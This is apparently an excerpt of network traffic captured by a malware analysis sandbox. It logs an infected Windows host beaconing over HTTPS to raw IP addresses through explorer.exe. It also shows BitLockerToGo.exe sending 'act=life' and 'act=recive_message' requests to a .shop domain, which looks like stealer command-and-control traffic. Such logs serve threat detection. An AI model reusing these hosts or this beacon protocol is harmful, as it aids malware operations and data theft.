2024-07-27 05:30:30 UTC	1071	IN	Data Raw: 00 73 00 65 00 63 00 74 00 69 00 6f 00 6e 00 20 00 27 00 7b 00 30 00 7d 00 27 00 01 80 ab 48 00 4b 00 43 00 55 00 5c 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 50 00 6f 00 6c 00 69 00 63 00 69 00 65 00 73 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 5c 00 54 00 72 00 61 00 6e 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 21 00 45 00 6e 00 61 00 62 00 6c 00 65 00 54 00 72 00 61 00 6e 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6e 00 67 00 00 80 bf 48 00 4b 00 43 00 55 00 5c 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 50 00 6f 00 6c 00 69 00 63 00 69 00 65 00 73 00 5c 00 4d 00 69 00 63 00 Data Ascii: section '{0}'HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription!EnableTranscriptingHKCU\Software\Policies\Mic
2024-07-27 05:30:30 UTC	16384	IN	Data Raw: 00 73 00 20 00 6e 00 6f 00 74 00 20 00 61 00 75 00 74 00 68 00 6f 00 72 00 69 00 7a 00 65 00 64 00 20 00 74 00 6f 00 20 00 72 00 75 00 6e 00 20 00 74 00 68 00 69 00 73 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 20 00 52 00 65 00 71 00 75 00 69 00 72 00 65 00 64 00 3a 00 20 00 7b 00 30 00 7d 00 2c 00 20 00 46 00 6f 00 75 00 6e 00 64 00 20 00 4f 00 53 00 20 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 3a 00 20 00 7b 00 31 00 7d 00 00 75 54 00 68 00 65 00 20 00 63 00 75 00 72 00 72 00 65 00 6e 00 74 00 20 00 75 00 73 00 65 00 72 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 61 00 75 00 74 00 68 00 6f 00 72 00 69 00 7a 00 65 00 64 00 20 00 74 00 6f 00 20 00 72 00 75 00 6e 00 20 00 74 00 68 00 69 00 73 00 20 00 61 00 Data Ascii: s not authorized to run this application. Required: {0}, Found OS version: {1}uThe current user is not authorized to run this a
2024-07-27 05:30:30 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea 07 66 b7 ea 39 66 b7 ea 67 66 b7 ea 8d 66 b7 ea ae 66 b7 ea c7 66 b7 ea db 66 b7 ea e5 66 b7 ea e8 66 b7 ea e7 66 b7 ea e5 66 b7 ea d9 66 b7 ea c7 66 b7 ea b0 66 b7 ea 93 66 b7 ea 6d 66 b7 ea 41 66 b7 ea 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ff9fgfffffffffffffmfAf
2024-07-27 05:30:30 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea 25 65 b6 e9 75 65 b6 e9 b8 66 b7 ea ec 65 b6 e9 fc 65 b6 e9 fe 66 b7 ea ff 65 b6 e9 fe 65 b6 e9 fe 66 b7 ea ff 65 b6 e9 fe 65 b6 e9 fe 66 b7 ea ff 65 b6 e9 fd 65 b6 e9 ef 66 b7 ea c1 65 b6 e9 80 66 b7 ea 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: f%euefeefeefeefeefef3
2024-07-27 05:30:30 UTC	16320	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ffffffffffffffffffffffffffffffffffffffffffff
2024-07-27 05:30:30 UTC	11278	IN	Data Raw: 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 74 79 70 65 3d 22 77 69 6e 33 32 22 20 6e 61 6d 65 3d 22 4d 69 63 72 6f 73 6f 66 74 2e 57 69 6e 64 6f 77 73 2e 43 6f 6d 6d 6f 6e 2d 43 6f 6e 74 72 6f 6c 73 22 20 76 65 72 73 69 6f 6e 3d 22 36 2e 30 2e 30 2e 30 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 20 6c 61 6e 67 75 61 67 65 3d 22 2a 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 2a 22 2f 3e 0d 0a 09 09 3c 2f 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 3e 0d 0a 09 3c 2f 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 09 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 Data Ascii: semblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" publicKeyToken="6595b64144ccf1df" language="" processorArchitecture=""/></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	51822	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:30 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1263
2024-07-27 05:30:30 UTC	1263	OUT	Data Raw: 68 4c 56 6c 65 69 42 5a 4d 75 45 6c 70 62 69 74 4b 44 4f 2b 4e 71 39 74 56 76 31 49 55 69 42 38 51 47 32 50 70 46 34 69 37 4c 6e 50 46 67 4a 70 39 50 42 6e 4e 64 36 64 52 78 65 32 71 47 32 54 41 4c 30 54 79 43 36 74 42 4b 44 36 58 35 2b 55 6a 41 49 42 72 39 73 64 5a 5a 38 65 6a 68 74 4b 5a 68 76 59 64 64 35 36 78 71 33 59 4c 47 65 59 30 58 79 70 76 62 54 72 69 55 4b 42 6e 35 45 51 30 63 5a 4a 35 48 6d 67 68 78 54 53 6b 62 5a 36 48 31 71 6e 4b 46 74 73 68 37 52 38 69 59 6f 79 6d 31 57 43 4d 44 76 69 77 45 56 4c 42 79 59 65 6f 31 44 5a 73 57 55 6e 2b 6a 4b 39 6e 6d 44 79 69 47 6e 49 6c 74 39 7a 75 54 4b 63 62 75 32 64 72 77 75 4f 2b 56 44 59 67 2f 4e 37 77 35 57 59 39 2f 51 38 78 31 6e 4f 64 71 74 58 4c 2b 71 4b 4d 2f 64 58 63 38 59 56 48 66 76 4c 53 34 70 Data Ascii: hLVleiBZMuElpbitKDO+Nq9tVv1IUiB8QG2PpF4i7LnPFgJp9PBnNd6dRxe2qG2TAL0TyC6tBKD6X5+UjAIBr9sdZZ8ejhtKZhvYdd56xq3YLGeY0XypvbTriUKBn5EQ0cZJ5HmghxTSkbZ6H1qnKFtsh7R8iYoym1WCMDviwEVLByYeo1DZsWUn+jK9nmDyiGnIlt9zuTKcbu2drwuO+VDYg/N7w5WY9/Q8x1nOdqtXL+qKM/dXc8YVHfvLS4p
2024-07-27 05:30:32 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:32 UTC	685	IN	Data Raw: 61 35 45 64 45 33 6b 45 44 32 62 48 4c 48 79 77 50 50 68 50 2b 55 45 78 53 4c 41 6c 68 39 2b 30 35 65 6f 45 44 79 54 6c 6e 63 57 59 66 42 68 75 70 57 55 58 47 73 64 34 71 65 6e 53 33 68 74 39 2f 49 45 72 4c 4d 73 68 62 57 41 74 32 33 55 69 59 66 62 77 70 32 69 6a 37 62 46 66 49 65 56 59 36 51 65 62 4d 30 37 41 46 4f 55 53 65 54 59 7a 35 48 54 53 52 52 50 31 65 59 69 75 48 77 47 4a 2f 69 63 47 42 7a 76 35 79 4f 2b 2f 57 75 43 35 64 46 38 49 33 32 74 32 77 64 57 6d 67 4d 52 79 37 6f 63 58 74 6f 4b 45 44 46 4a 2b 6f 2b 37 6a 71 35 77 38 51 31 44 78 4e 5a 55 50 56 6c 39 55 55 69 73 72 55 5a 59 33 47 2b 47 49 4b 6a 49 66 54 72 56 31 65 31 71 42 50 46 32 57 68 74 31 41 75 48 52 38 6c 41 34 74 71 66 65 39 67 6e 37 39 33 46 64 4b 33 76 6f 71 6d 2b 41 6d 62 77 75 Data Ascii: a5EdE3kED2bHLHywPPhP+UExSLAlh9+05eoEDyTlncWYfBhupWUXGsd4qenS3ht9/IErLMshbWAt23UiYfbwp2ij7bFfIeVY6QebM07AFOUSeTYz5HTSRRP1eYiuHwGJ/icGBzv5yO+/WuC5dF8I32t2wdWmgMRy7ocXtoKEDFJ+o+7jq5w8Q1DxNZUPVl9UUisrUZY3G+GIKjIfTrV1e1qBPF2Wht1AuHR8lA4tqfe9gn793FdK3voqm+Ambwu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	51824	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:32 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:32 UTC	1267	OUT	Data Raw: 43 45 37 30 4f 6b 41 6f 56 54 32 65 53 57 42 4a 4e 31 4e 34 32 4c 47 74 45 78 42 31 65 35 2f 72 36 62 5a 33 4f 32 30 46 44 70 2b 59 62 49 6d 6e 53 61 47 74 32 31 53 58 76 77 49 56 56 5a 6b 4a 41 2b 48 51 56 4d 45 35 31 5a 37 79 52 64 4c 58 4f 58 4e 58 58 4e 36 63 63 68 44 7a 57 58 4f 33 71 59 4e 4e 6b 47 4b 41 76 6d 45 6c 6b 6e 33 37 6d 4e 76 4a 58 4a 6d 74 48 56 5a 6d 4b 2f 52 63 36 39 69 4d 33 50 2f 32 67 53 33 7a 38 64 48 58 32 72 4b 72 39 2b 79 30 6c 52 50 4d 56 31 52 79 4d 6c 64 30 4e 4a 42 2b 6d 64 72 55 4b 39 79 35 5a 73 35 76 2f 6a 50 76 6d 35 34 33 69 65 57 42 61 69 65 71 58 6e 4c 50 37 79 44 41 57 64 2f 53 4e 6e 59 72 68 36 6b 35 77 4e 68 2b 48 2f 4b 4e 37 6e 4b 41 45 54 68 54 2b 76 4b 75 33 32 67 38 49 2b 58 50 43 5a 4d 4b 39 46 45 45 39 58 4c Data Ascii: CE70OkAoVT2eSWBJN1N42LGtExB1e5/r6bZ3O20FDp+YbImnSaGt21SXvwIVVZkJA+HQVME51Z7yRdLXOXNXXN6cchDzWXO3qYNNkGKAvmElkn37mNvJXJmtHVZmK/Rc69iM3P/2gS3z8dHX2rKr9+y0lRPMV1RyMld0NJB+mdrUK9y5Zs5v/jPvm543ieWBaieqXnLP7yDAWd/SNnYrh6k5wNh+H/KN7nKAEThT+vKu32g8I+XPCZMK9FEE9XL
2024-07-27 05:30:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:33 UTC	685	IN	Data Raw: 49 2f 6a 46 2f 71 59 50 63 65 59 75 78 64 34 2b 6d 6f 6b 33 42 67 6d 70 46 61 2f 44 62 6b 79 35 74 6e 6b 6c 53 30 59 52 59 2b 6b 2f 4f 7a 38 58 37 49 37 69 33 7a 67 63 75 50 57 77 77 7a 77 6c 56 4f 47 75 7a 69 76 55 2b 77 6f 6d 71 6a 6f 66 76 54 70 31 6e 32 37 57 49 2b 48 4a 6e 46 70 52 4b 37 36 6f 35 71 43 67 45 4e 38 30 2b 33 6d 4a 76 2f 51 74 62 43 6b 41 46 50 62 74 41 72 45 57 47 47 58 71 74 31 34 38 49 58 71 4f 6c 73 4c 70 67 75 4f 63 7a 4e 73 6e 37 6f 43 44 79 69 36 37 55 31 6f 78 4e 47 4f 67 2b 4e 45 46 35 51 54 78 77 57 48 78 74 53 6f 4d 62 74 68 66 2b 41 50 48 54 39 49 57 46 7a 75 63 56 35 66 47 6c 69 36 6e 63 52 51 32 5a 4a 6f 77 47 32 7a 5a 6f 50 37 48 62 7a 64 69 6e 62 7a 72 37 43 67 51 70 67 67 32 2f 4e 77 68 6a 30 48 79 54 35 53 43 59 6c 73 Data Ascii: I/jF/qYPceYuxd4+mok3BgmpFa/Dbky5tnklS0YRY+k/Oz8X7I7i3zgcuPWwwzwlVOGuzivU+womqjofvTp1n27WI+HJnFpRK76o5qCgEN80+3mJv/QtbCkAFPbtArEWGGXqt148IXqOlsLpguOczNsn7oCDyi67U1oxNGOg+NEF5QTxwWHxtSoMbthf+APHT9IWFzucV5fGli6ncRQ2ZJowG2zZoP7Hbzdinbzr7CgQpgg2/Nwhj0HyT5SCYls

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	51828	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:33 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: callosallsaospz.shop
2024-07-27 05:30:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-27 05:30:34 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6vspo5oa79d9cec495ogdj44dl; expires=Tue, 19-Nov-2024 23:17:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utQiI3L6UZElpdFnLSKKaevzQCRD%2BYXE9azyD7P598Qb7NbdMxWtbj8w0UYc8WthB%2FaiidqpHaYlg%2FEyNo2jTzq9OeCBRgxiAHWsveBLuRhd4cZrf8ztIeWYywOtcHE367uR%2Fsa4Wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3cf87d2342a7-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:30:34 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-27 05:30:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	51829	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:35 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:35 UTC	1267	OUT	Data Raw: 70 6c 49 65 59 54 57 4c 6e 72 74 2f 4a 7a 6c 30 46 6c 39 4f 45 72 79 76 4d 76 59 66 64 56 79 44 52 47 48 38 41 41 74 64 73 76 5a 68 31 73 4b 4d 72 73 38 32 74 61 77 48 43 6b 52 6a 45 37 55 66 67 6a 2b 71 7a 63 51 51 2b 2f 62 65 63 64 65 35 4b 53 6b 71 64 36 6e 31 71 73 49 31 76 6d 41 65 76 51 65 59 5a 4e 48 73 53 4c 63 5a 68 6b 43 6c 6f 6f 6a 4c 6c 6d 58 79 74 66 6a 42 6b 79 68 6e 50 2b 78 34 46 72 52 45 4d 67 58 33 63 2f 2f 36 30 6d 51 35 53 79 38 53 7a 73 31 72 31 41 67 4d 39 56 75 75 70 66 63 48 56 73 51 49 4b 50 39 31 6f 44 6c 51 69 6e 42 35 53 61 31 6b 61 36 6a 4a 6a 53 2b 70 73 43 44 74 6c 73 78 6b 68 47 42 54 4c 53 4c 63 78 66 57 6f 4f 4f 41 36 41 42 74 73 39 61 46 32 57 66 6b 70 36 30 69 32 59 6a 36 33 4d 6f 56 57 56 53 50 6c 50 66 61 69 6a 51 33 Data Ascii: plIeYTWLnrt/Jzl0Fl9OEryvMvYfdVyDRGH8AAtdsvZh1sKMrs82tawHCkRjE7Ufgj+qzcQQ+/becde5KSkqd6n1qsI1vmAevQeYZNHsSLcZhkCloojLlmXytfjBkyhnP+x4FrREMgX3c//60mQ5Sy8Szs1r1AgM9VuupfcHVsQIKP91oDlQinB5Sa1ka6jJjS+psCDtlsxkhGBTLSLcxfWoOOA6ABts9aF2Wfkp60i2Yj63MoVWVSPlPfaijQ3
2024-07-27 05:30:36 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:36 UTC	685	IN	Data Raw: 48 4a 61 6e 45 4a 68 32 6e 6f 49 45 31 63 74 7a 47 31 70 34 6c 2b 30 55 6b 5a 76 50 67 79 70 4f 31 63 4d 38 56 7a 75 6d 64 50 48 53 30 79 77 46 30 34 68 75 70 76 30 31 46 67 68 78 62 6f 59 4c 6f 32 6f 36 4f 46 33 43 53 6e 49 65 6a 6c 39 6c 39 37 4e 65 76 44 33 64 30 70 36 54 70 2b 59 31 47 4c 73 6c 41 4b 6b 6e 58 53 72 58 77 5a 72 6d 66 6a 4c 73 4d 36 49 4d 6a 4f 7a 6a 61 70 64 4b 66 65 72 30 46 70 77 4a 4a 63 50 56 35 55 59 61 57 77 51 4d 67 61 46 6d 41 36 35 50 4f 44 67 48 31 62 73 7a 66 6c 59 4d 46 78 63 53 36 63 6d 6c 53 61 69 32 46 64 6b 73 33 50 43 65 48 74 62 77 30 6d 6d 39 6e 63 69 4a 6e 4c 57 68 31 4c 78 43 30 46 5a 74 4f 2f 50 39 4b 70 65 52 6d 77 2b 31 65 4b 4d 71 6a 6e 33 59 4c 77 56 76 45 4c 51 61 75 57 39 56 34 66 4e 47 30 36 36 53 48 54 4a Data Ascii: HJanEJh2noIE1ctzG1p4l+0UkZvPgypO1cM8VzumdPHS0ywF04hupv01FghxboYLo2o6OF3CSnIejl9l97NevD3d0p6Tp+Y1GLslAKknXSrXwZrmfjLsM6IMjOzjapdKfer0FpwJJcPV5UYaWwQMgaFmA65PODgH1bszflYMFxcS6cmlSai2Fdks3PCeHtbw0mm9nciJnLWh1LxC0FZtO/P9KpeRmw+1eKMqjn3YLwVvELQauW9V4fNG066SHTJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	51832	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:36 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: callosallsaospz.shop
2024-07-27 05:30:36 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
2024-07-27 05:30:36 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f31q6gtqghgjm2omkp8228ugfv; expires=Tue, 19-Nov-2024 23:17:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbEVQIAkhpRbD8ADEYdnBuJGl8wjHXE67Kh7XOelQvPwcaH2Hb4bUkMFQ3oNZc9U0VjNU5nCr%2B1H5SX1JXXmiVpiPMluEiRWeyNQnaqwCstxBouYZWB%2Bg9tTZlR%2FlAl7%2Fe6NkarRkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d085db10f46-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:30:36 UTC	559	IN	Data Raw: 34 32 32 30 0d 0a 54 36 68 50 39 30 35 4b 72 34 36 32 35 51 57 7a 59 4e 65 4b 35 75 56 64 6d 38 77 74 70 35 53 52 47 48 52 71 2f 39 31 6d 46 71 49 30 69 6a 6e 56 64 48 36 44 72 4d 57 41 4a 34 6b 55 70 66 2b 44 79 58 2f 36 71 41 2b 64 38 76 42 30 42 77 2f 54 2f 78 42 37 67 48 58 4f 4c 70 73 39 4c 34 4f 73 30 35 30 6e 69 54 75 73 71 49 4f 4c 66 36 48 75 53 4d 33 32 38 48 51 57 43 35 53 79 46 6e 72 42 4a 38 51 6f 6e 79 73 70 79 2b 2f 61 69 47 44 57 42 62 62 67 69 49 77 77 38 36 45 50 69 37 62 30 59 6c 5a 51 33 5a 41 44 59 73 4d 43 79 54 79 63 62 44 65 44 39 5a 53 41 61 35 46 61 39 65 75 44 68 7a 48 39 71 45 62 50 2f 50 6c 38 46 77 36 56 72 51 39 77 79 69 66 4b 4b 35 34 68 49 4e 2f 69 30 49 39 72 30 41 2b 32 71 4d 72 48 4f 4f 48 75 46 34 57 6c 77 58 6b 48 47 Data Ascii: 4220T6hP905Kr4625QWzYNeK5uVdm8wtp5SRGHRq/91mFqI0ijnVdH6DrMWAJ4kUpf+DyX/6qA+d8vB0Bw/T/xB7gHXOLps9L4Os050niTusqIOLf6HuSM328HQWC5SyFnrBJ8Qonyspy+/aiGDWBbbgiIww86EPi7b0YlZQ3ZADYsMCyTycbDeD9ZSAa5Fa9euDhzH9qEbP/Pl8Fw6VrQ9wyifKK54hIN/i0I9r0A+2qMrHOOHuF4WlwXkHG
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 38 4d 2f 69 42 69 57 49 69 62 4b 2b 70 53 59 4b 63 68 43 73 75 54 45 33 33 2f 33 71 30 44 58 39 2b 46 2f 47 42 71 52 75 67 4a 35 77 79 50 4b 4b 4a 49 68 4a 73 76 72 31 34 39 6a 30 41 79 35 34 6f 65 44 50 4c 6e 67 44 38 4c 75 73 79 4a 57 4f 5a 36 37 41 32 62 44 49 34 6f 79 32 7a 56 6f 79 75 43 55 33 79 66 62 42 4c 6a 68 6a 34 41 33 39 62 78 45 79 76 58 36 66 52 41 43 6e 72 63 4f 63 73 34 73 7a 53 69 53 50 69 62 47 34 64 65 4e 59 5a 46 4d 39 65 2b 63 78 32 65 35 67 45 7a 55 34 4d 46 35 42 78 6e 64 6f 45 70 74 67 43 72 47 62 63 31 73 49 63 58 6a 32 59 70 74 33 77 65 34 34 59 57 47 4d 76 2b 6c 54 73 33 2b 39 33 30 57 44 4a 43 77 43 6e 54 4f 4a 63 38 70 6e 79 56 6f 67 36 7a 54 6e 79 65 4a 51 6f 58 6c 69 49 77 7a 75 35 74 4d 79 2f 6a 30 62 46 59 58 30 36 5a 45 Data Ascii: 8M/iBiWIibK+pSYKchCsuTE33/3q0DX9+F/GBqRugJ5wyPKKJIhJsvr149j0Ay54oeDPLngD8LusyJWOZ67A2bDI4oy2zVoyuCU3yfbBLjhj4A39bxEyvX6fRACnrcOcs4szSiSPibG4deNYZFM9e+cx2e5gEzU4MF5BxndoEptgCrGbc1sIcXj2Ypt3we44YWGMv+lTs3+930WDJCwCnTOJc8pnyVog6zTnyeJQoXliIwzu5tMy/j0bFYX06ZE
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 63 71 6d 43 63 69 77 4f 6a 54 68 69 65 66 51 72 4c 77 78 4e 39 2f 7a 37 35 43 79 64 6a 34 64 68 39 49 67 76 45 64 4e 4d 63 68 69 6e 58 56 4b 43 54 46 35 74 75 4f 62 64 73 4e 76 4f 69 4d 6a 6a 62 36 72 6b 50 44 39 2f 39 32 47 77 32 65 75 67 6c 78 77 43 48 4e 4b 70 52 73 5a 6f 33 72 7a 4d 63 2f 6b 54 4b 34 35 49 2b 4c 66 63 79 74 51 63 76 78 35 54 6f 4a 52 6f 54 2f 41 33 69 41 64 59 6f 69 6c 43 45 69 78 75 4c 59 68 6d 66 56 41 62 2f 6f 69 34 49 35 38 61 64 50 31 2f 48 38 65 78 63 44 6c 72 49 4b 63 63 45 6f 7a 57 33 62 62 43 2f 56 72 49 7a 48 53 76 67 34 39 66 66 4b 6e 6e 2f 2b 6f 67 2b 64 74 76 64 77 46 67 57 58 74 41 74 33 78 79 50 4b 49 4a 38 2b 49 4d 33 73 32 6f 46 6d 33 51 65 30 35 49 65 56 4d 2f 2b 6a 53 63 33 6b 73 7a 52 57 44 34 58 2f 58 44 54 67 4a Data Ascii: cqmCciwOjThiefQrLwxN9/z75Cydj4dh9IgvEdNMchinXVKCTF5tuObdsNvOiMjjb6rkPD9/92Gw2euglxwCHNKpRsZo3rzMc/kTK45I+LfcytQcvx5ToJRoT/A3iAdYoilCEixuLYhmfVAb/oi4I58adP1/H8excDlrIKccEozW3bbC/VrIzHSvg49ffKnn/+og+dtvdwFgWXtAt3xyPKIJ8+IM3s2oFm3Qe05IeVM/+jSc3kszRWD4X/XDTgJ
